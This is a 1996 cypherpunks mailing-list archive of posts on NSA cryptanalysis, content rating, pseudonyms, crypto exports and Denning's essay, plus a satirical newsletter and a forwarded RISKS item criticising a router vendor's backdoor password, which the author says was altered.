In-Reply-To: <ad2dae4f12021004983e@[205.199.118.202]>
Message-ID: <199601261152.GAA18691@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Since Perry has on several occasions said he does not want to hear about
> politics and other "off-topic" posts, and since he has written at least
> five of these posts just today (the "Gentleman do not" thread), I suggest
> he heed his own advice.

Well, the topic was initially quite cryptography related -- a
discussion of the question of whether government cryptanalysis efforts
are a "good idea". However, in my last message on the topic you
probably saw that I noted that the issue had certainly slipped
sufficiently from the local agenda that I personally noted that it was
no longer appropriate for me to post on the topic. I don't intend to
say anything more about it since it no longer was merely a discussion
of whether we need an NSA.

However, redirecting the topic, I will note that Phill's assertion
that U.S. cryptographic intelligence versus the Japanese at the start
of World War II was inadequate is just plain wrong. We had already
broken virtually every important Japanese diplomatic and military
code, including perhaps the greatest feat of cryptanalysis of all
time, the breaking of PURPLE. See "The Code Breakers" for details.

And yes, discussing historical cryptanalysis efforts is indeed part of
the charter.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sat, 27 Jan 1996 01:09:58 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: "This post is G-Rated"
In-Reply-To: <2.2.32.19960126111304.00968f58@panix.com>
Message-ID: <Pine.LNX.3.91.960126071720.142A-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 26 Jan 1996, Duncan Frissell wrote:

> One wonders why people spend so much time arguing about the V-chip, telecoms
> dereg, sex on the net, Trade Policy, or Immigration when it's intuitively
> obvious that these things are (or soon will be) no longer subject to central
> control of any kind.

It is absolutely fascinating to observe the widely differing views held 
by you and Lucky Green on the same subjects.

The two of you seem to represent opposite ends of the spectrum of 
cypherpunks thought, to the extent that there is such a thing.

Food for thought.

--
Johnathan M. Corgan
jcorgan@aeinet.com
http://www.aeinet.com/jcorgan.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sat, 27 Jan 1996 01:27:19 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Bad key management
Message-ID: <v0153050dad2ea48598aa@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>From RISKS:

------------------------------

Date: Tue, 23 Jan 1996 20:32:37 -0500 (EST)
From: Ed Ravin <eravin@panix.com>
Subject: I won't tell if you won't...

I just found this browsing through a router manufacturer's "Frequently
Asked Questions" file:

   Q3       I have a bridge/router, and I have forgotten my password.  I am
   no longer able to log in and configure the device(s).  What do I do
   now?

   Do not panic! Enter the following password at the password
   prompt:XYZZYHIMOM.  This should get you into the unit.  Notice!! This is
   a back door to the units, and should not be made available to people
   who do not need to know about it!

And I don't even own one of these routers -- I found this in a reseller's
online catalog.  Back doors in devices that are often hooked directly to
external networks are a Bad Idea, if you ask me.  At least the manufacturer
documented it...

(password above changed to protect the guilty)

Ed Ravin  +1 212 678 5545  eravin@panix.com

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 27 Jan 1996 01:33:09 +0800
To: cypherpunks@toad.com
Subject: Re: mouse droppings
Message-ID: <199601261616.IAA11484@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 PM 1/24/96 -0500, j. ercole wrote:
>One issue, "mouse droppings" --- "a trail of every site they visit and for
>how long [on the www], was highlighted as an example of existing privacy
>regulations falling short of consumer expectations.  Apparently, the
>amorphous public is shocked, *SHOCKED* I tell you , to discover that their
>service providers are selling the personal preference information to the
>highest bidder.  More info in article.
>
>Would some rocket scientist speak to this terrifying mouse droppings issue?

Jeff Wienstein and others have provided, or are working on, various
technological solutions to this problem:  

Meanwhile the FTC wants to solve this privacy problem by checking out every
persons computer to make sure you are not keeping any privacy violating
information in your files.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.cosmos.att.com>
Date: Fri, 26 Jan 1996 21:46:00 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Intl. Keysize Limit vs. U.S. Keysize Limit (Was: Re: Hack Lotus?)
Message-ID: <2.2.32.19960126133039.0076f604@cosmos.cosmos.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 AM 1/26/96 -0500, Futplex wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
It would be just as easy to build the intl. version of Notes with 128-bit+spy
>keys, with 40 bits of truly protected key and 88 bits of espionage-enabled 
>key, and then use straight 128 bits in the domestic version.

Does anyone else find it worrisome that given 24 bits of a 64-bit key, the
encryption may not be as strong as the same algorithm with a 40-bit key
(e.g., for a variable key-length algorithm like RC4)? In other words, I
suspect some algorithms might not derive their protection mechanisms equally
from each key bit. What if guess the remaining 40 bits is as easy as
guessing the rest of xyl******?

Just pondering.

                                        Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 27 Jan 1996 01:49:46 +0800
To: Alan Horowitz <perry@piermont.com>
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <199601261641.IAA13862@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


[This discussion was originally about the "right" of governments
to read people mail.  As is natural and appropriate, it immediately
became necessary to discuss the general question of rights.]

>On Thu, 25 Jan 1996, Perry E. Metzger wrote:
>> I am a funny sort of person. I don't believe that governments should
>> be able to do anything that individuals cannot.

At 07:00 PM 1/25/96 -0500, Alan Horowitz wrote:
>   So violent criminals should never be jailed?

Probably he believes they should be shot instead.

The principle that governments have no special moral rights beyond
those of normal men leads logically to the conclusion that men
have a natural right to engage in just retribution, provided of
course that such retribution can be seen to be just.

John Locke has written at some length, attempting to justify limited
government on this principle.



>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Sat, 27 Jan 1996 00:46:44 +0800
To: mwohler@ix.netcom.com (Marc J. Wohler)
Subject: Re: Gentlemen do not read each other's mail
In-Reply-To: <199601252343.PAA00884@ix11.ix.netcom.com>
Message-ID: <199601261447.IAA08462@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


Marc J. Wohler writes:

> "Gentlemen do not read each other's mail."
>                        Ben Franklin
>
>Original quote by Ben Franklin when the British government published
>(stolen?) private letters of
>John Adams to his wife critical  of Franklyn and other members of the
>Continental Congress.

Can you provide a source for this? Franklin was known to use encryption,
and the quote has been attributed to Stimson and no one else for years. I
really doubt Franklin was naive enough to think that the British government
were gentlemanly enough to respect his privacy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 27 Jan 1996 01:02:49 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: "This post is G-Rated"
In-Reply-To: <199601260353.TAA07900@netcom6.netcom.com>
Message-ID: <9601261457.AA12607@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
 > It seems to me that a moderated news group or mailing list would be easy. 
 > You don't expect explicit sex descriptions to show up in the comp.
 > hieararcy.  

So what's the current moderated/unmoderated newsgroup ratio?  (And
what's the ratio weighted by newsgroup traffic or popularity?)

 > An unmoderated group or list carries a higher risk of seeing inappropriate
 > material.  However even unmoderated lists have standards and those people
 > who enforce those standards.  

Enforce?  Enforce?  Exsqueeze me?

 > This kind of enforcement is an example of
 > communitarian as opposed to authoritarian control.  It all depends on just
 > how vital it is to the consumer (and rating group) that NO inappropriate
 > material appear.

And of course, it doesn't work.  There's an unlimited amount of
mindless dreck floating around every unmoderated nesgroup; I've been
reading news long enough (and NN makes it easy enough) that I avoid it
without a second thought.  I assure you, however, that no attempts at 
"nettiquette enforcement" are effective in a general sense.

 > Crypto relevence: Public key systems or digital signitures can help ensure
 > that the material actually comes from it reputed source (e.g. the
 > modarator).

How many people are there willing to moderate newsgroups?  How many
people are willing to set up alternatives to moderated newsgroups once
the moderator becomes unpopular (see the history of the .telecom
groups for an illustration)?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Sat, 27 Jan 1996 00:30:22 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Secrecy of NSA Affiliation
In-Reply-To: <ad2d127a0c021004fb6e@[205.199.118.202]>
Message-ID: <199601261458.IAA09396@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain



>Up until recently (18-30 months ago) NSA employees were only allowed
>to identify themselves as employees of DoD.  It was common knowledge,
>that unspecific references to Fort Meade meant NSA; and if you saw
>a P.O. from Procurement Office, Fort Meade, it meant the NSA was buying
>it.

Nothing has really changed. During orientation, you are told to keep your
NSA affiliation low key. But you are not ordered to. This was part of the
No Such Agency stuff, trying not to draw attention to yourself or the
Agency, and to avoid questions from the curious. Perhaps the most important
reason for keeping it low key though, was to preserve your career
options. But for disciplines such as crypto, the choices are quite limited
so broadcasting you are NSA does not matter much.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Sat, 27 Jan 1996 00:49:38 +0800
To: chiniet@pr.erau.edu (Thomas Chiniewicz)
Subject: Re: TOP_tap
In-Reply-To: <Pine.SOL.3.91.960125134924.9630A-100000@moon>
Message-ID: <199601261500.JAA09492@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


Thomas Chiniewicz writes:

>isn't the NSA a branch of the CIA?  And I thought the CIA and DOD were
>seperate organizations or was that an incorrect assumption?

No, it is a civilian organization within the DOD. The CIA is a civilian
organization outside of the DOD. Although it appears Deutch is trying to
change all of that as we speak, and Inman wants to abolish the CIA
altogether.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Sat, 27 Jan 1996 01:01:26 +0800
To: perry@piermont.com
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601252139.QAA16761@jekyll.piermont.com>
Message-ID: <199601261504.JAA09730@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:

>I am a funny sort of person. I don't believe that governments should
>be able to do anything that individuals cannot. If it is bad for me to
>steal, it is also bad for a government official to steal. If it is bad
>for me to listen in on my neighbor's phone calls, it is bad for the
>government, too.

I do not see anything funny, but you are at odds with the Constitution,
where the people have granted the government certain rights that they have
not granted to themselves. But it seems we may be making progress at
getting those rights ourselves.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 26 Jan 1996 22:46:13 +0800
To: cypherpunks@toad.com
Subject: Re: Etch-a-sketch
Message-ID: <9601261427.AA05709@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> Ok.. I'm still getting mail regarding the etch-a-sketch keychain. Thus
> I'm going to look at how to get em for everyone. :)
> 
> Just letting you all know. Don't bury me in 'I want one mail.' As soon as
> I have the info I'll get it out to the hungry crowd. Heh. At that point
> you can bury me happily.
> 
> Jonathan

     Can't be too many cpunks out there with rugrats. I've seen these in
toy stores.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 27 Jan 1996 02:06:54 +0800
To: Johnathan Corgan <frissell@panix.com>
Subject: Re: "This post is G-Rated"
Message-ID: <v02120d1dad2ebefb369a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:24 1/26/96, Johnathan Corgan wrote:
>On Fri, 26 Jan 1996, Duncan Frissell wrote:
>
>> One wonders why people spend so much time arguing about the V-chip, telecoms
>> dereg, sex on the net, Trade Policy, or Immigration when it's intuitively
>> obvious that these things are (or soon will be) no longer subject to central
>> control of any kind.
>
>It is absolutely fascinating to observe the widely differing views held
>by you and Lucky Green on the same subjects.
>
>The two of you seem to represent opposite ends of the spectrum of
>cypherpunks thought, to the extent that there is such a thing.

Its been like that for a long time :-)
Just for the record, I hope that Duncan's view will prove to be correct.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 27 Jan 1996 00:45:07 +0800
To: cypherpunks@toad.com
Subject: Re: Denning's Crypto Archy
Message-ID: <2.2.32.19960126144544.006706b4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:14 PM 1/26/96 +0100, Anonymous wrote:
>
>Cypherptoady's updatest unscratchable crypto itch and salve:
>
>
>http://www.cosc.georgetown.edu/~denning/crypto/Future.html
>
>

A good read.  You know you're making progress when they start to address
your arguments.

"Although May limply asserts that anarchy does not mean lawlessness and
social disorder, the absence of government would lead to exactly these
states of chaos."

I've never known Tim to offer limp assertations.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 27 Jan 1996 03:43:36 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: OFFSHORE RESOURCES
Message-ID: <Pine.SUN.3.91.960126093953.26235A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

There has been sporadic interest on this list with regard to
offshore incorporation, banking, etc.  While ads for offshore
services are common in the international press, until now, none
of these companies has an Internet presence.  

THE ECONOMIST has an ad for OCRA, a group that specializes in
offshore company services.  What's new is that they have a Web
page.  It includes a good primer on the benifits from going 
offshore and on selected offshore jurisdictions.  I've never done
business with these folks, but they have good info.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Fri, 26 Jan 1996 17:56:34 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Enquirer
Message-ID: <199601260850.JAA06678@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


(The new issue wasn't supposed to come out for a month or so, but you guys
are throwing us WAY too much ammo.)


			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


Perry Metzger today resigned from Hillary Clinton's defense team.  Spokes-
persons for Ms. Clinton refused to comment, but Mr. Metzger's offices did
release a statement saying that Mr. Metzger's skills were in the area of
debunking conspiracy theorists, and that he had little or no experience
in the field of actual conspiracies. 

Compuserve today restored access priviledges to Dr. Leslie Franklin after
receiving written confirmation from two medical doctors that Dr. Franklin
is indeed a man.  Compuserve, forced to cancel the subscriptions of almost
one million female members after complaints from the Saudi Arabian government
about unchaperoned conversations between men and women, has stated that in
the future, all potential subscribers must supply a semen sample with their
subscription request, and that test tubes and .GIFs of Cindy Crawford in
skimpy lingerie will be included with a number of major mainstream computer
publications in order to facilitate the new requirements.  C2.org 
immediately offered one month's free access to anyone whose application 
included a PAP smear.

The NSA, the CIA, the FBI, and a coalition of 437 other U.S. government
agencies today announced that they were dropping their support of the
policy of Government Access to (encryption) Keys, commonly known as GAK,
in favor of a new policy of Government Access to Everything, or GAE.  The
new policy, using technology first pioneered by the Prodigy Network and
later refined by Microsoft and its Registration Wizard(tm), would require
that all new computers include a special government mandated GAE chip which
would allow the government to download the entire contents of the computer's
hard drive whenever the computer was connected to the Internet or other on-
line service.  In related news, the Clinton administration, in an unusual
display of solidarity with Senate Majority Leader Bob Dole, has announced
that a new version of GAK will immediately be presented to the Senate, this
time requiring government escrow of all house and automobile keys, and the
Dow Chemical Company has received a multi-million dollar contract to develop
a new fabric for America's curtains and draperies that would become
transparent in the presence of a court order.

The Cypherpunk Academy of Codes and Cyphers today announced a new nomination
for the Perry Award, given to the cypherpunk who has done the most to
improve the S/N ratio of the list.  Today's nominee is Dr. Fred Cohen, for
not posting anything for the past month.  Dr. Cohen joins Alice de 'nominous
in contention for the prestigious award, first won by Dr. Jonathon Pierce,
personal psychopharmacologist to Larry Detweiler.

Consumer's Union reported today that an extensive series of tests, performed
over a 3 month period, has determined that owners of high-performance snakes,
such as blue racers and black mambas, should use Windows NT encryption and
security for lubrication purposes, but that owners of more standard models,
such as vipers and constrictors, would see little or no benefit from the use
of the more expensive NT product, and would be better served by the use of
the less expensive Windows 95.

"The truth IS out there - we make sure it STAYS out there."
	       	Motto of the Central Intelligence Agency

Eric Blossom today announced a new filtered version of cypherpunks, 
"Cpunks Ultra-lite", that will be limited to messages about cryptography
and C and C++ programming, and that will probably average about two
messages a month.

Due to sagging sales for the second edition of "Applied Cryptography",
John Wiley and Sons today announced the publication of an abridged version,
"Cryptography for Dummies - The Swimsuit Edition", featuring a centerfold
of Elle McPherson in an "RC4 in 3 Lines of Perl" thong bikini.  Ms.
McPherson was reportedly detained at La Guardia airport while NSA officials
searched the ITAR for an excuse to confiscate the garment.

Governor Pete Wilson of California today ordered the removal of all
computers from public school grades K-12, since it was discovered that
79% of them had been "hacked" to receive Spice and the Playboy channel.

Rich Graves was forced to change his signature file today when it was
discovered that, due to a rider in the present telecommunications bill
passed by the Senate, statists are now required to "set a good example" for
America's youth, and are no longer allowed to fuck.

Frank Semalo today announced he was suing Compuserve for $99.95 plus tax.
Mr. Samalo's complaint stated that, due to the small size of the test tubes
provided by the defendants and his inability to print out .GIF files in
color, the Compuserve registration process resulted in a ruined keyboard.

Anonymous User's claim that the NSA has broken PGP was withdrawn today,
when it was discovered that the "break" occurred at a recent Washington,
D.C. GAE conference, where a NSA spokesman transferred the popular program
to CDROM and attacked it with a sledge hammer.

The FBI today released accused serial killer Timothy May from custody and
issued an apology to the retired Intel engineer, stating that he was no
longer a suspect.  The agency also issued retraction letters to over one
thousand Internet users who had been warned that they might be potential
targets.  "What else were we supposed to do," asked one unidentified FBI
agent, "when we found all of those names in something called a killfile?"

Louis Freeh's head is still stuck.

The Hoover Corporation today announced a new government contract for the
development of a 17 story tall, one billion terrabyte capacity canister
style vacuum cleaner with T3 and fiber-optic connection ability.  The new
machine, to be delivered to an unnamed government agency,  would be used,
according to a Hoover spokesperson, for "unspecified janitorial work on
the Internet."

--
CTHULHU for President - Why vote for the LESSER of two evils?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 27 Jan 1996 03:47:28 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: DUH
Message-ID: <Pine.SUN.3.91.960126095043.26235B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

In my OFFSHORE RESOURCES post I left out the URL, which is:

			http://www.ocra.com/


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Khalil <fardank@batelco.com.bh>
Date: Fri, 26 Jan 1996 21:13:01 +0800
To: cypherpunks@toad.com
Subject: Information
Message-ID: <2.2.32.19960126065538.00691458@batelco.com.bh>
MIME-Version: 1.0
Content-Type: text/plain


I am very much interested to find out more about this type of remailing service.
I would appreciate any information I get.
Regards
Khalil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 27 Jan 1996 03:50:19 +0800
To: cypherpunks@toad.com
Subject: Nym use in the real world
Message-ID: <199601261801.KAA07578@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain





With the coming Internet restrictions and growing use of the
net by LEAs, it's become obvious to me that I shouldn't post
messages with my real name.  But I have some problems/questions about
using a nym:

1. reputation.  My nym will need to build it's own reputation, I know.
But I currently get offers of work based on my reputation and posts.  I
would like this to continue.  When it comes time to do the work and
collect the pay, I need to tie my nym to me.  Reasons: only the
most adventurous firms would hire someone to do work without knowing
their real name.  I also need to have the proper forms (1099 etc)
filed.  I know that a lot of people on the list would say that I shouldn't
file taxes, but I am (currently) willing to pay the price to stay
out of jail.

The other problem (tying the nym to RealName) for employers is
more severe.  A nym is only good when no one can tie it to your
real name.  If I have to tell everyone I do work for what my real
name and nym is, soon enough people will be able to tie the two that
the nym becomes nearly useless.


2. does it (a nym) really help?  Police and governments are used to
dealing with people who change their names, use fake names, etc.
I get the impression that having multiple/fake names is considered by police
to be evidence or at least indication of guilt.  "If you're not guilty
why're you hiding?".

Using a nym would at least help with the problem of police or
other parties searching through Dejanews/Altavista for my posts for
incriminating evidence.  But if my nym is investigated for some future
crime (fuck Exon) and my nym isn't secure enough to protect my
RealName, it will be a liability.


Thoughts?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 27 Jan 1996 00:48:30 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
In-Reply-To: <ad2bf34e04021004d2fa@[205.199.118.202]>
Message-ID: <199601261506.KAA11118@homeport.org>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:

| You have to ask yourself this question: "Why are there no cryptographically
| strong products--finished products, not specific ciphers or chunks of
| code--developed in Europe and freely imported into the U.S.?"

	There are.  If you buy a Gauntlet Internet firewall from TIS,
you can also buy a German T1 speed DES card for it.  I believe the
code was written by TIS's London office.  The Israeli Firewall-1
(version 2) firewall offers VPN (Virtual Private Networks) with some
decent encryption scheme.

	There are not yet a lot of products, and these, as Tim will
doubtless point out, are somewhat obscure, not mass market products.
I would attribute that to the nature of information in the
international marketplace.  There is not 'perfect information' but
very imprecise and foggy information.  Most of us don't know anyone
who has bought a foriegn crypto product (heck, how many of us have
bought a crypto product at all?).  Incidentally, TIS (ww.tis.com) did
a survey of forgien crypto products which is on the web.

	There are very few 'full blown' encryption products out there.
PGP seems to have the most users, but I don't know of any real
compitition for it, inside or outside the US.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 27 Jan 1996 04:05:24 +0800
To: cypherpunks@toad.com
Subject: Doctor Denning
Message-ID: <199601261807.KAA21401@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I just read the new and improved Dorothy Denning essay at

    http://www.cosc.georgetown.edu/crypto/Future.html

and I must say that I am impressed to see that our august little
group has managed to define most of the issues Dr. Denning
addresses.  She even uses the Gospel According to Tim as her
first bibliography entry.

One should realize, of course, that whether Crypto Anarchy
prevails depends not upon the varied philosophical leanings of
citizen-units May and Denning, but rather upon whether our
mathematics is more powerful than their jackbooted thugs.

Success also depends upon the implementation of widely
distributed comunications systems which are not vulnerable to
attacks launched against any particular set of nodes, and which
obfuscate which processing elements are responsible for providing
any specified instance of a service.

Crypto Anarchy running on the World Wide Crypto-Mesh.  Your
guarantee of a government-free future, Denning and friends
notwithstanding.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 27 Jan 1996 05:43:48 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: "This post is G-Rated"
Message-ID: <199601261839.KAA19984@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:57 AM 1/26/96 -0600, Mike McNally wrote:
>Bill Frantz writes:
> > An unmoderated group or list carries a higher risk of seeing inappropriate
> > material.  However even unmoderated lists have standards and those people
> > who enforce those standards.  
>
>Enforce?  Enforce?  Exsqueeze me?

On cypherpunks, Perry is the principle enforcer, although others frequently
join in.

>
> > This kind of enforcement is an example of
> > communitarian as opposed to authoritarian control.  It all depends on just
> > how vital it is to the consumer (and rating group) that NO inappropriate
> > material appear.
>
>And of course, it doesn't work.  There's an unlimited amount of
>mindless dreck floating around every unmoderated nesgroup; I've been
>reading news long enough (and NN makes it easy enough) that I avoid it
>without a second thought.  I assure you, however, that no attempts at 
>"nettiquette enforcement" are effective in a general sense.

Of course it works.  Cypherpunks stays much more on the topic than it would
without Perry.  Since Perry has no way of directly enforcing his opinions,
they can be overridden by any other posters, but his "moral suasion" does
have an effect on many of us.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 27 Jan 1996 01:26:00 +0800
To: cypherpunks@toad.com
Subject: BAA_bab
Message-ID: <199601261542.KAA21959@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-26-96. TWP:

   "Police Search of AOL Files Divides the On-Line World."

      Police descended on the company's headquarters Monday to
      perform the first such search ever of America Online
      records. Police are enthusiastic about the potentially 
      incriminating information stored in computers.

      "It's a bit chilling, especially if you consider the
      idea of police pulling up an instant profile on you with
      the punch of a couple buttons," Woolie baa-ed to Babe.


   1-26-96. WSJ:

   "Internet Racial Hatred Case Investigated."

      The Mannheim prosecutor's office is investigating
      CompuServe Inc. and Deutsche Telekom AG's T-Online
      service for inciting racial hatred, a crime in Germany,
      because they provide access to the Internet, where a
      Canadian neo-Nazi has set up a home page. Although Mr. 
      Zuendel lives in Toronto, "because it's available 
      over the Internet, it also can be called up in Germany," 
      the official said. "Then the scene of the crime is all 
      of Germany."


   BAA_bab












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 27 Jan 1996 05:29:58 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <199601261839.KAA19993@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:13 AM 1/26/96 -0500, Duncan Frissell wrote:
>At 01:58 PM 1/25/96 -0800, Bill Frantz wrote:
>
>>The big problem is how are the labels attached to the programs.  I
>>agree with Tim that it is probably imposible for individual Usenet
>>postings.  However is should be possible for TV programs, and whole
>>newsgroups.
>
>Since TV programs will soon *be* "individual Usenet postings," it will not
>be possible to rate them.  Even the Earth doesn't have that much time.  The
>economic "drag" involved would be too great.

I think you have a very different view of rating than I do.  For example, I
would be comfortable rating all the Sesame Street shows for sex and
violence without seeing any more than I have seen, just based on the
reputation of the show's producers.  Based on reviews in the newspaper
(since the net has replaced TV for me), most of the current network shows
can also be rated for all their episodes.  Remember also, there is an
"unrated" catagory.  Some people will refuse to access unrated material. 
Others, (I suspect you and I) may seek it out.

>Once we have high-speed connections to the nets, the amount of video out
>there will explode.  There will be more to watch than watchers (remember
>video archives).  Search engines will help people find what they want and
>avoid what they don't want.  "Sex and Drugs and Rock and Roll" (Wine, Women,
>and Song) will be like any other available subject -- some will want to find
>it and some will want to avoid it.  Just another problem of how to extract
>the content you want from all the mess.  Search engines won't be all that
>perfect but they will be all we have.

One possible addition to search engines would be to give the people who
have actually viewed the video/web page etc. an opportunity to rate it on
any of several criteria including whether they thought it was worth their
time.  Other people could then use these ratings as they wanted (including
ignoring them).  The big problem I see would be making the system easy
enough to use to get a reasonable response.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 27 Jan 1996 01:29:59 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <Pine.SV4.3.91.960126021308.19760C-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960126103914.25000B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jan 1996, Alan Horowitz wrote:

> The first was in a monograph which was putting forth the proposition that 
> FDR  ardently desired to become involved in the war.  By the way, FDR was 
> the man who made wage income, subject to federal taxation for the first 
> time.
> 
> I don't remember where I read the second.
> 
> To me, both stories are plausible.

In fact, before FDR, wage income was taxed; however, it was one large 
check at the end of the yeraar (or the beginning of the next, really).

The high cost of WW II made it a necessity for the gvm't to have more 
money at a particular moment, and not wait for year-end.

I can't remember when the amendment constitutionalizing (is that a word) 
the income tax was passed; however, the income tax (and wage income was 
